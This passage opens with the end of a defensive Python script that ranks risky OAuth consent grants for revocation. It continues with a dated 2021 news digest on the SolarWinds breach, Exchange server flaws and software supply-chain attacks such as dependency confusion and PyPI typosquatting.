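    ConsentGrant("Calendar Widget", "00000000-0000-0000-0000-000000000002",
                 ["Calendars.Read", "User.Read"],
                 consent_by="user", publisher_verified=True, grant_id="g-2"),
    ConsentGrant("Doc Exporter", "00000000-0000-0000-0000-000000000003",
                 ["Files.Read.All", "offline_access"],
                 consent_by="user", publisher_verified=True, grant_id="g-3"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_GRANTS):
        print(f.severity.upper(), f.grant_id, f.app_name, "; ".join(f.reasons))
```

The scoring is deliberately simple and tenant policy will adjust the scope list, but the shape of the output is the useful part: a ranked queue in which an unverified app holding admin-consented mailbox access and a refresh token sits at the top, which is exactly the kind of grant that survives a password reset and must be revoked explicitly.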


_______________________________________________________________________________________

(March 23, 2021)


SolarWinds breach is one of the most challenging hacking incidents

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack. The acting director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Brandon Wales, has called it the most complex and challenging hacking incident the agency has come up against.

Ref - CyberArk

_______________________________________________________________________________________

(March 23, 2021)


Microsoft proposes incentivizing digital solutions to mitigate supply chain risk

The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.

Ref - Microsoft  

_______________________________________________________________________________________

(March 22, 2021)


The ‘Frankencloud’ model is the biggest security risk

According to a researcher, information technology environments have evolved into a “Frankenstein” approach: firms scrambled to take advantage of the cloud while maintaining their existing systems of record. This led to systems riddled with complexity and built from disconnected parts bolted together.

Ref - TechCrunch

_______________________________________________________________________________________

(March 22, 2021)


The SolarWinds victims are now solidified

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.

Ref - FCW

_______________________________________________________________________________________

(March 22, 2021)


A report about SilverFish cyber-espionage group

The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global cybercrime campaign that uses modern management methods and sophisticated tools, including its own malware testing sandbox. The group has strong ties with the SolarWinds attack, the EvilCorp group, and some other well-known malware campaigns.


_______________________________________________________________________________________

(March 22, 2021)


Shell is another victim of the Accellion supply chain hack

Energy giant Shell has disclosed a data breach, via a supply chain attack, after attackers compromised the company's secure file-sharing system powered by Accellion's File Transfer Appliance (FTA). Upon learning of the incident, Shell addressed the vulnerabilities with its service provider and cybersecurity team and started an investigation to better understand the nature and extent of the incident.


_______________________________________________________________________________________

(March 22, 2021)


The new insider threat of compromised partners

The current rash of financial fraud and supply chain attacks exploit a seemingly unsolvable vulnerability in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. As they interact with partners, the door to exploitation opens, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since malware and malicious links are not necessary for successful exfiltration.


_______________________________________________________________________________________

(March 22, 2021)


Three vulnerabilities exposed during SolarWinds attack

SolarWinds attackers leveraged three key vulnerabilities in the current IT ecosystem. They leveraged the supply chain weakness, injecting malware into the supplier network to gain access to the core network. They also took advantage of single sign-on systems and exploited traditional multifactor authentication systems.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 22, 2021)


In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing

The new cybersecurity leadership in the Biden White House is brainstorming methods to establish new early warning systems that combine traditional intelligence agency methods with private sector expertise. Reportedly chief among the new approaches is establishing more profound information-sharing methods with the private sector.

Ref - CSO Online 

_______________________________________________________________________________________

(March 22, 2021)


KPMG advisory on SolarWinds attack

According to the recent KPMG advisory, each malware used during SolarWinds had a tactical purpose. SUNSPOT was designed by the threat actor(s) to function specifically within SolarWinds’ software build environment to insert a malicious backdoor called SUNBURST. TEARDROP and RAINDROP were designed to be used by the threat actor(s) to deploy a modified version of Cobalt Strike. Further, SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are malicious tools reported to have been used by threat actor(s) in an environment where there was a pre-existing SUNBURST compromise.

Ref - KPMG

_______________________________________________________________________________________

(March 21, 2021)

How to prevent supply chain attacks?

The key to mitigating supply chain security risks is to ensure each of your third-party vendors is compliant with the strictest of cybersecurity standards, whether or not regulatory requirements are enforced. Complacency is the primary driver of supply chain attack vulnerability. To keep third-party vendors compliant, security questionnaires should be sent to each of them on a regular basis to continuously scrutinize their security posture.

Ref - UpGuard

_______________________________________________________________________________________

(March 21, 2021)


CISA releases a tool to detect SolarWinds malicious activity

The U.S. CISA has released a new tool (CISA Hunt and Incident Response Program, or CHIRP) that detects malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with the activity detailed in CISA's related alerts.


_______________________________________________________________________________________

(March 20, 2021)


SolarWinds is a major disaster in the modern era of computing

Researcher Davi Ottenheimer has compared the SolarWinds attack with a Dust Bowl disaster. According to him, Microsoft for so many years worked on an extremely expedited model with minimal security or ecosystem investment inviting a predictable disaster.


_______________________________________________________________________________________

(March 20, 2021)


A Swiss firm has accessed servers of a SolarWinds hacker

A Swiss cybersecurity firm says it has accessed servers used by a hacking group (Silverfish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued with their campaign through this month.

Ref - ProDaft

_______________________________________________________________________________________

(March 18, 2021)


Xcode Project spreading MacOS malware to Apple developers

Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer’s macOS computer. 


_______________________________________________________________________________________

(March 18, 2021)


CISA releases detection tool for SolarWinds malicious activity 

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. CISA Hunt and Incident Response Program (CHIRP), the new forensics collection tool, is a Python-based tool that helps detect SolarWinds malicious activity IOCs on Windows operating systems.


_______________________________________________________________________________________

(March 18, 2021)

SolarWinds-linked threat group SilverFish took advantage of enterprise victims

Swiss cybersecurity firm Prodaft said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations, including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.

Ref - ZDNet

_______________________________________________________________________________________

(March 18, 2021)


Beware the Package Typosquatting Supply Chain Attack

In a package typosquatting attack, the attacker publishes a package whose name mimics that of an existing package on a public registry, in the hope that users or developers will accidentally download the malicious package instead of the legitimate one.


_______________________________________________________________________________________

(March 18, 2021)


XcodeSpy malware can target iOS devs in a supply chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply chain attack to install a macOS backdoor on the developer's computer. Like other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.


_______________________________________________________________________________________

(March 18, 2021)


NSA, Homeland Security push service to mitigate cyber-attacks

The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to embrace a system known as Protective DNS, in which a private security firm would monitor and filter web traffic. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.

Ref - Bloomberg
 
_______________________________________________________________________________________

(March 18, 2021)


Will the U.S. never be safe from cyberattacks?

While Washington grapples with how to prevent another attack of this scale (the SolarWinds breach), the hard truth is this: there is no such thing as a foolproof cybersecurity defense, because human beings write computer code, and despite being incredibly smart, those people make mistakes. Each minuscule error creates one more pathway for hackers to launch cyberattacks.

Ref - Yahoo

_______________________________________________________________________________________

(March 18, 2021)


Rethinking Patch management after SolarWinds breach

The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and created a backdoor to their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for software and devices deployed into their environment, as well as for new updates and patches.


_______________________________________________________________________________________

(March 17, 2021)


Zero-trust helped Splunk dodge supply chain attack

Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government, to have a zero-trust architecture in place. Many organizations are building out an in-depth set of data analytics capabilities as part of a broader zero-trust strategy, and then using those capabilities to improve visibility and security operations.


_______________________________________________________________________________________

(March 17, 2021)


SolarWinds attackers gained access to Mimecast’s production environment

Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.

Ref - SC Media

_______________________________________________________________________________________

(March 17, 2021)


Lawmakers drilled multiple agencies for SolarWinds attack

The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.

Ref - The Hill

_______________________________________________________________________________________

(March 17, 2021)


Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures (TTPs) used by the advanced persistent threat (APT) actor involved in the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify the APT's TTPs and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.

Ref - CISA

_______________________________________________________________________________________

(March 17, 2021)


Key takeaways for security admins from SolarWinds attacks

Security and IT admins can take note of several key points regarding supply chain attacks. Potential supply chain attack victims often lack the right tools to detect them. The Golden SAML attack allowed attackers to jump from on-premises systems to cloud systems, effectively bypassing MFA, which exposes weaknesses in current authentication systems.

Ref - CSO Online 

_______________________________________________________________________________________

(March 17, 2021)


How the Linux Foundation’s software signing combats supply chain attacks

The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. sigstore protects open source consumers from such attacks as dependency confusion attacks. These attacks dupe package managers into installing a remotely-hosted malicious version of a locally-available resource such as a library file.


_______________________________________________________________________________________

(March 16, 2021)


Biden's supply chain EO may uncover these cyber risks

While the government continues to assess the scope and scale of the SolarWinds breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.

Ref - FCW 

_______________________________________________________________________________________

(March 16, 2021)


Mimecast decommissioned SolarWinds Orion after hack

The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.

Ref - CRN

_______________________________________________________________________________________

(March 16, 2021)


SolarWinds underestimated network’s role in security

According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.


_______________________________________________________________________________________

(March 16, 2021)


Using CodeQL to spot traces of Solorigate

If a build server is backdoored with the build hijacking component of the Solorigate malware campaign, the malware will inject additional source code at compilation time. If CodeQL is observing the build process on the infected server, it will extract the injected malicious source code together with the genuine source code. The resulting CodeQL database will therefore contain traces of the malicious Solorigate source code.

Ref - GitHub

_______________________________________________________________________________________

(March 16, 2021)


Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion

Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.


_______________________________________________________________________________________

(March 16, 2021)


How to prevent supply chain attacks?

Here are 11 cybersecurity strategies that could help prevent supply chain attacks: implement honeytokens, secure privileged access management, implement a zero-trust architecture, assume a breach has already occurred, identify all potential insider threats, protect vulnerable resources, minimize access to sensitive data, implement strict shadow IT rules, send regular third-party risk assessments, monitor vendor networks for vulnerabilities, and identify all vendor data leaks.

Ref - UpGuard

_______________________________________________________________________________________

(March 16, 2021)


Software supply chain attacks are not easy to tackle

As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.


_______________________________________________________________________________________

(March 15, 2021)


Security ratings could raise the bar on cyber hygiene

Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.


_______________________________________________________________________________________

(March 15, 2021)


Better security approach against supply chain attacks 

Effective procurement language should be developed that holds a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they provide. Organizations need to consider the software and service provider's processes when discussing a partnership and defining what security measures will be implemented.

Ref - Medium

_______________________________________________________________________________________

(March 15, 2021)


TIA reveals new global supply chain security standard - SCS 9001

The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.

Ref - Yahoo 

_______________________________________________________________________________________

(March 15, 2021)


SolarWinds attacks recovery could take the U.S. government 18 months

Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.


_______________________________________________________________________________________

(March 14, 2021)


White House seeks new cybersecurity approach after failing to detect hacks

The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States, and the failure of the intelligence agencies to detect them, are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both attacks were run from servers inside the United States, putting them out of reach of the NSA's early warning system.


_______________________________________________________________________________________

(March 14, 2021)

Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks

There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or “BOM”. In its simplest form, the BOM is similar to a long list of ingredients, in which all materials and quantities needed to manufacture an end product are listed. If the “BOM” is done with great precision, it is possible to provide deep insight into the product and all its parts and its corresponding supply chain vulnerabilities.

Ref - Medium

_______________________________________________________________________________________

(March 13, 2021)


Security best practices after SolarWinds supply chain attack

Implementing the supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Users are recommended to conduct asset and access inventories, elevate third-party risk management and ensure third-party relationships are collaborative.


_______________________________________________________________________________________

(March 12, 2021)


A senior administration official on the response to the Microsoft and SolarWinds intrusions

According to a senior administration official, the government is in week three of a four-week remediation across the federal government. The compromised agencies were all tasked with a particular set of activities and then with an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review, and the rest will complete it by the end of March.


_______________________________________________________________________________________

(March 12, 2021)


SolarWinds and Microsoft hacks spark debate over western retaliation

Cyber experts have cautioned that retaliatory steps in response to the SolarWinds and Microsoft hacks may not be justified. The SolarWinds and Microsoft hacks are not instances of conflict in any conventional sense; they are espionage, and so part of the continual interaction between these states.


_______________________________________________________________________________________

(March 12, 2021)


The first-ever U.S. national cyber director after SolarWinds breach

The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response. 

Ref - Fortune

_______________________________________________________________________________________

(March 11, 2021)


Risks of supply chain attacks for organizations

Supply chain security risks are not new, but recent headlines are a reminder for consumers to re-examine their security practices. The SolarWinds/Orion cyberattack had impacted more than 18,000 organizations, and it might serve as the major point of attention for dealing with digital supply chain risks.

Ref - Synopsys

_______________________________________________________________________________________

(March 11, 2021)


Managing supply chain security risk 

After the SolarWinds attack, information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should be built on standardized practices drawn from many existing risk disciplines. It also requires cooperation and collaborative relationships across all areas of the organization.


_______________________________________________________________________________________

(March 11, 2021)


Embedded devices are a blind spot in the SolarWinds attack

Attention so far has focused on how the SolarWinds attackers accessed the network, be it through Office 365 or VMware, and on a separate campaign that exploited a bug in SolarWinds. However, the industry is overlooking a more nefarious but equally plausible objective: attackers may have used SolarWinds as a pathway into key networks where they could access and burrow deep into the embedded devices in industrial control systems.

Ref - The Hill

_______________________________________________________________________________________

(March 11, 2021)


Nation-state hackers exploited the U.S. Internet security gap

U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.


_______________________________________________________________________________________

(March 10, 2021)


Risks of integrating technology vulnerabilities into the foundational technology

SolarWinds attacks and other events in 2020 spotlight a new burden to manage for C-Suites/Boards: The malicious supply chain influences of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding & exploiting technology vulnerabilities, but actually creating & integrating them into the foundational technology. 

Ref - Forbes

_______________________________________________________________________________________

(March 10, 2021)


Hacker group claims access to internal video feeds by compromising supplier

Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.


_______________________________________________________________________________________

(March 10, 2021)


How to beat the new breed of Supply Chain attacks

The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.

Ref - SentinelOne 

_______________________________________________________________________________________

(March 10, 2021)


Monitoring the software supply chain in Microsoft environment

Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.

Ref - Microsoft 

_______________________________________________________________________________________

(March 10, 2021)


SolarWinds is not an isolated event going forward - VMware Report

The 2021 Global Cybersecurity Outlook report from VMware Security Business Unit suggests that "island-hopping" attacks are on the rise, in which attackers jump from one network to another along a supply chain, as occurred in the SolarWinds attack. Organizations have to realize that it is no longer simply a question of whether breaches along their supply chains can be leveraged to attack them, but whether they themselves can be used to attack their customers.


_______________________________________________________________________________________

(March 9, 2021)


The inside story of the stealthy SolarWinds SUNBURST attack

The SolarWinds attack was performed without weaponizing any known zero-day vulnerability. The attackers were able to make their malicious version of the SolarWinds Orion DLL look like a normal version of the software. It was virtually impossible to detect because everything looked official. But as the attackers begin to move through a network by accessing new accounts, the abnormal behavior of the targeted users and devices they operate opens a new window of opportunity for detection.

Ref - Varonis 


_______________________________________________________________________________________

(March 9, 2021)


The separate SolarWinds attack described by researchers

Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the 'Spiral' attack on one organization in November 2020, when they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server during an incident response effort. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020.


_______________________________________________________________________________________

(March 9, 2021)


Microsoft released a patch for older versions of Exchange

Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The security updates for older versions of Exchange only address the four newly disclosed flaws, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premises Exchange servers.

Ref - ZDNet

_______________________________________________________________________________________

(March 9, 2021)


Implications of recent supply chain attacks

The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.

Ref - Forbes

_______________________________________________________________________________________

(March 9, 2021)


Analysis of the biggest Python supply chain attack ever

On March 1st, 2021, a newly created account on the Python Package Index (PyPI) uploaded 3591 new packages. Each package had a name that closely resembled the name of another popular package. However, the install script in each package only signals to someone that it was successfully downloaded and installed, and does nothing beyond that. This could be the work of a security researcher who wanted to raise awareness about typosquatting supply chain attacks by publishing a large number of fake packages and collecting statistics about how many times each one was downloaded.

Ref - Sogeti

_______________________________________________________________________________________

(March 9, 2021)


More clues appear to link Supernova web shell activity to China

According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.

Ref - TechRadar 

_______________________________________________________________________________________

(March 8, 2021)


‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US

Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify retaliation for SolarWinds is one that the US also violates with its own cyberespionage. And there's still no evidence that Russia's hacking, in this case, went beyond the kind of stealthy intelligence gathering the US performs routinely around the world.

Ref - Wired 

_______________________________________________________________________________________

(March 8, 2021)


Hackers who hid Supernova malware in SolarWinds Orion linked to China

Intrusion activity related to the Supernova malware, which was planted on compromised SolarWinds Orion installations exposed to the public internet, points to an espionage threat actor based in China. Security researchers named this hacker group 'Spiral' and correlated findings from two intrusions in 2020 on the same victim network to attribute the activity to the same intruder.


_______________________________________________________________________________________

(March 8, 2021)


SolarWinds Breach: Supernova malware linked to a China-based threat group

Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.

Ref - ZDNet

_______________________________________________________________________________________

(March 8, 2021)


A supply chain attack is targeting the Python community with 4000 fake modules

A user has uploaded 3951 utterly bogus PyPI packages, with names that are near misses of several genuine Python package names. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command that was intended to run when the package was installed, rather than when it was used.

Ref - Sophos

_______________________________________________________________________________________

(March 6, 2021)


This new type of supply-chain attack has serious consequences 

A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.


_______________________________________________________________________________________

(March 5, 2021)


A supply chain attack has breached multiple airlines

A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).


_______________________________________________________________________________________

(March 5, 2021)


Singapore is the latest victim of supply chain attack

An aviation IT company that says it serves 90% of the world's airlines has been breached in what appears to be a coordinated supply chain attack. Customers of at least four companies - Malaysia Airlines, Singapore Airlines, Finnair Airlines, and Air New Zealand - may have been affected by the incident.


_______________________________________________________________________________________

(March 5, 2021)


Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel

Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.


_______________________________________________________________________________________

(March 5, 2021)


SolarWinds: 30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities 

Four exploits found in Microsoft’s Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their emails hacked, according to a report by KrebsOnSecurity. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.

Ref - The Verge

_______________________________________________________________________________________

(March 4, 2021)


Researchers disclosed additional malware linked to SolarWinds attackers

Researchers with Microsoft and FireEye found three new malware families (named GoldMax, Sibot, and GoldFinder), which they said are used by the threat group behind the SolarWinds attack, adding to the custom malware already attributed to that group.


_______________________________________________________________________________________

(March 3, 2021)


Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks

Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.


_______________________________________________________________________________________

(March 3, 2021)


SolarWinds breach showed increased sophistication of advanced threat actors

Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.


_______________________________________________________________________________________

(March 2, 2021)


SolarWinds breach cost $3.5 million in expenses 

SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.


_______________________________________________________________________________________

(March 1, 2021)


Dependency Confusion is being used to create copycat packages

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

Ref - Sonatype

_______________________________________________________________________________________

(March 2, 2021)


The SolarWinds hack compromised NASA and FAA

In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.

Ref - Wired

_______________________________________________________________________________________

(February 25, 2021)

Microsoft now sharing CodeQL queries for scanning code for SolarWinds-like implants

Microsoft has open-sourced CodeQL queries that developers can use to scan source code for malicious implants matching the SolarWinds supply-chain attack. To verify that the attackers had not modified its own code, Microsoft wrote these CodeQL queries and used them to scan its codebase for implants matching the SolarWinds IOCs.


_______________________________________________________________________________________

(February 25, 2021)


Security experts were blindsided by the SolarWinds attack

The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. The government agencies charged with defending against such things proved no match for it, which brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.

Ref - Medium

_______________________________________________________________________________________

(February 25, 2021)


SolarWinds hackers take advantage of Amazon Elastic Compute Cloud

Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.

Ref - CRN

_______________________________________________________________________________________

(February 24, 2021)


SolarWinds breach is one of the biggest attacks ever - US Senate committee

The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.


_______________________________________________________________________________________

(February 24, 2021)


More SolarWinds breach victims could still be undisclosed

Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players were penetrated in the SolarWinds breach. They have not been as forthcoming as other victims, leaving policymakers and potential customers in the dark.

Ref - WSJ

_______________________________________________________________________________________

(February 24, 2021)


Important takeaways from the US Senate's hearing of SolarWinds breach

The Senate Intelligence Committee held its first public hearing on the SolarWinds hack, and there are five key takeaways: fingers pointed to Russia as the hack's perpetrator, and companies want the US to hold Russia accountable. Amazon was a no-show despite being invited, and lawmakers weren't happy about it. Lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats. A new law setting standards for breached companies could be on the horizon. In addition, the hearings showed cooperation between the government and industry.


_______________________________________________________________________________________

(February 24, 2021)


SolarWinds hackers targeted NASA and Federal Aviation Administration networks

Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.


_______________________________________________________________________________________

(February 24, 2021)


There is substantial evidence of Russian involvement in SolarWinds breach

Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.

Ref - CNN

_______________________________________________________________________________________

(February 23, 2021)


SolarWinds attackers stayed for several months in FireEye's network

The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. The attacker wasn't alive every single day on their network, Kevin Mandia, CEO of FireEye, told the US Senate Intelligence Committee in response to a question about the attack time frame on FireEye's network.


_______________________________________________________________________________________

(February 23, 2021)


Finding answers on the SolarWinds breach

Key senators and corporate executives warned at a hearing on the SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.


_______________________________________________________________________________________

(February 23, 2021)


AWS infrastructure was used in SolarWinds hack

Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.

Ref - CRN

_______________________________________________________________________________________

(February 23, 2021)


Mandatory breach disclosure in wake of SolarWinds breach

